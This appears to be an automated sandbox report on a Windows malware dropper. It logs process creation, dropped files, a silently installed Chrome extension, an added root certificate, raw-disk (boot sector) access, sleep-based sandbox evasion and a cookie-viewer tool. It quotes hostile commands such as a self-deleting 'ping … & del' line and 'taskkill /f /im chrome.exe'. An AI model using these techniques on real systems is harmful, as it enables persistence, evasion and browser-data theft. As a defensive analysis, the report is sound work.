Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Install
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: IpB8f8qwze.exeStatic file information: File size 4882440 > 1048576
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to behavior
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IpB8f8qwze.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: IpB8f8qwze.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\src\wix38\build\ship\x86\burn.pdb source: IpB8f8qwze.exe
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1615173766196.exe, 00000009.00000000.261008599.000000000040F000.00000002.00020000.sdmp, 1615173766196.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000002.295382420.000000000114C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.0.dr
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Detected unpacking (creates a PE file in dynamic memory)Show sources
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D33A
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: real checksum: 0x17b848 should be: 0x4af12c
Source: MSI75EE.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: IpB8f8qwze.exeStatic PE information: real checksum: 0x17b848 should be: 0x4af12c
Source: IpB8f8qwze.exeStatic PE information: section name: .wixburn
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: section name: .wixburn
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A695 push ecx; ret 0_2_0042A6A8
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100105D9 push ecx; ret 0_2_100105EC
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100105D9 push ecx; ret 2_2_100105EC
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E2F1 push ecx; ret 9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_01143FB5 push ecx; ret 23_2_01143FC8

Persistence and Installation Behavior:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D840
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DAD0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D3D0
Installs new ROOT certificatesShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD BlobJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI75EE.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Roaming\1615173766196.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcgJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon48.pngJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.htmlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\background.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\book.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\jquery-1.8.3.min.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.jsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\manifest.jsonJump to behavior

Boot Survival:

barindex
Contains functionality to infect the boot sectorShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D840
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DAD0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D3D0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00429765 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00429765
Source: C:\Windows\SysWOW64\msiexec.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\1615173766196.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100206000_2_10020600
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100206002_2_10020600
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_100197E0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100206000_2_10020600
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100206002_2_10020600
Source: C:\Users\user\Desktop\IpB8f8qwze.exe TID: 6572Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe TID: 6908Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe TID: 6980Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004306F1 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0043078Ch0_2_004306F1
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_004306F1 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00430785h0_2_004306F1
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h0_2_10022710
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h2_2_10022710
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00436AF7 FindFirstFileW,FindClose,0_2_00436AF7
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0043740C GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose,0_2_0043740C
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00413414 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_00413414
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_1001A1D0 FindFirstFileA,FindClose,0_2_1001A1D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_1001A1D0 FindFirstFileA,FindClose,2_2_1001A1D0
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.284039910.0000000003F44000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.280801586.0000000003ED1000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.260160543.0000000002991000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 83C12B0D0FA88B10.exe, 00000004.00000002.276741323.0000000002B59000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: ecv953D.tmp.9.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:FE8E72D9-9324-F27F-91C7-FEE66B531521&ctry=US&time=20200930T144715Z&lc=en-US&pl=en-US&idtp=mid&uid=8706df6d-9543-4122-b8e1-1fcdd5939be6&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=ad85f9b2e3394f9e956f9ddd7e571bd3&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663612&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663612&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.283953429.0000000003F17000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 83C12B0D0FA88B10.exe, 00000002.00000003.280620377.0000000002F4A000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000003.260160543.0000000002991000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
